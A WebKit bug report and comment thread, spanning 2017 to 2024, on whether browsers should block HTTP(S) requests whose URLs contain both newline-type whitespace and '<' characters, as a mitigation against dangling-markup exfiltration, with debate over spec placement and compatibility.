172748 – Consider blocking requests to HTTP(S) URLs that contain both `\n` and `<` characters.

NEW 172748

Consider blocking requests to HTTP(S) URLs that contain both `\n` and `<` characters.

https://bugs.webkit.org/show_bug.cgi?id=172748

Summary Consider blocking requests to HTTP(S) URLs that contain both `\n` and `<` cha...

Mike West

Reported 2017-05-31 06:29:01 PDT

In the hopes of mitigating one form of dangling-markup-based exfiltration, Blink plans to block requests whose URLs contained both removable whitespace (`\n`, `\r`, `\t`) _and_ raw less-than (`<`) characters. https://github.com/whatwg/fetch/issues/546 lays out the strategy and justification in more detail, proposed patches to URL and Fetch are up for review at https://github.com/whatwg/url/pull/284 and https://github.com/whatwg/fetch/pull/519 respectively, and Blink's "Intent to Remove" might be helpful: https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ. CCing achristensen@ who's had helpful comments on the URL patch, though I don't think they're in favor of the exact implementation strategy outlined there. :) WDYT?

Attachments
Add attachment proposed patch, testcase, etc.

Alex Christensen

Comment 1 2017-05-31 10:57:21 PDT

As outlined in https://github.com/whatwg/url/pull/284 I am very opposed to this approach to mitigating the problem. Please don't do this in Chromium or the specifications.

Mike West

Comment 2 2017-05-31 22:57:21 PDT

Hey Alex! My understanding from your comments in the patch against URL (particularly https://github.com/whatwg/url/pull/284#issuecomment-304087641) is that you're not opposed to the behavior, but opposed to doing it by patching URL as opposed to HTML. Is that not accurate?

Alex Christensen

Comment 3 2019-09-13 08:57:20 PDT

URLs are used in a lot of places that aren't vulnerable to dangling markup attacks, so it definitely shouldn't go in the URL parser or specification. HTML is a more appropriate place because you're trying to avoid URLs that look like HTML, and URLs should not need to know anything about HTML. That said, I'm worried about compatibility. I'm under the impression that hand written URLs sometimes contain tabs, newlines, < and > for good reasons, but I have no data to back that up.

Mike West

Comment 4 2019-10-08 11:50:54 PDT

> URLs are used in a lot of places that aren't vulnerable to dangling markup attacks, > so it definitely shouldn't go in the URL parser or specification. HTML is a more > appropriate place because you're trying to avoid URLs that look like HTML, and URLs > should not need to know anything about HTML. It's totally possible to implement this outside the URL parser. In Chromium, it's implemented as a flag that the URL parser sets during parsing (https://cs.chromium.org/chromium/src/url/url_canon_etc.cc?rcl=2bd9bea1c6b9ace95707a0e8715f40793c9dc909&l=26). We're scanning the URL anyway at that point to remove whitespace, and scanning the string prior to canonicalizing it turned out to show up in benchmarks. There is likely a clever way to avoid that performance impact, but it's what Chromium is doing today. From a spec perspective, I'd be fine with this all living in HTML, with the caveat that it seems like a large amount of work to go through that spec to find all the places where URLs could be parsed and wire them up to some parsing proxy. I don't have time right now to do that work. :( > That said, I'm worried about compatibility. I'm under the impression that hand > written URLs sometimes contain tabs, newlines, < and > for good reasons, but I > have no data to back that up. FWIW, Chrome has been shipping this behavior since 2017.

Simon Pieters (:zcorpan)

Comment 5 2024-05-30 04:26:16 PDT

The current proposal is https://github.com/whatwg/html/pull/10022

Note You need to log in before you can comment on or make changes to this bug.

Status NEW

Resolution

Priority P2

Severity Enhancement

Classification Unclassified

Version WebKit Nightly Build

Hardware All

OS All

Product WebKit

Component WebCore Misc.

Assignee

Nobody

Reported

2017-05-31 06:29 PDT

Modified

2024-05-30 10:54 PDT History

CC List

7 users Show

URL

Keywords

Depends on

Blocks